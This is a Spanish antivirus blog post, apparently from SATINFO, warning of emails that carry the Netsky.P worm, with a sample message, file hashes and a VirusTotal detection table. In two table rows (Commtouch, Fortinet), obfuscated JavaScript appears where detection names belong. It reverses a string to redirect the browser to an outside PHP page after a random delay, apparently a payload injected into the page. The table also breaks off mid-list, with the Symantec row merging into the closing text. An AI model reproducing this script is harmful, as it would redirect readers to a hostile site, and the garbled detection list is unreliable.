SIGUEN LLEGANDO MAILS ANEXANDO NETSKY P
El dichoso NETSKY, del que ya hemos hablado muchas veces, sigue llegando reenviado por usuarios que no tienen NINGUN antivirus activo , ya que 49 de 53 AV lo detectan y controlan, segun el preanalisis de virustotal:
MAIL MALICIOSO:
_______________
Asunto: Re: Hi
De: <falso remitente>@hotmail.com
Fecha: 02/06/2014 20:25
Para: <destinatario>
I have attached your file. Your password is jkl44563.
______________
FIN MAIL MALICIOSO
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: details.txt …
Detecciones: 49 / 53
Fecha de análisis: 2014-06-03 07:11:33 UTC ( hace 0 minutos )
1 22
Antivirus Resultado Actualización
AVG I-Worm/Netsky 20140603
Ad-Aware Win32.Generic.497472 20140603
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20140602
AhnLab-V3 Win-Trojan/Fsg.29568 20140602
AntiVir Worm/Netsky.AP 20140603
Avast Win32:Netsky-AF [Wrm] 20140603
Baidu-International Worm.Win32.NetSky.az 20140602
BitDefender Win32.Generic.497472 20140603
Bkav W32.SkyNetP.Worm 20140602
CAT-QuickHeal W32.NetSky.P 20140603
CMC Generic.Win32.3018e99857!MD 20140530
ClamAV Worm.NetSky-14 20140602
Commtouch $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20140603
F-Secure Win32.Generic.497472 20140602
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20140603
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20140603
MicroWorld-eScan Win32.Generic.497472 20140603
Microsoft Worm:Win32/Netsky.P@mm 20140603
NANO-Antivirus Trojan.Win32.NetSky.idzx 20140603
Norman Netsky.P 20140603
Panda W32/Netsky.AE.worm 20140602
Qihoo-360 Win32/Worm.d2e 20140603
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20140603
SUPERAntiSpyware Worm.Netsky-P 20140603
Sophos W32/Netsky-P 20140603
Symantec todas las variedades de dicho malware.
Como siempre, dicha utilidad está disponible en nuestra web.
saludos
ms, 3-6-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.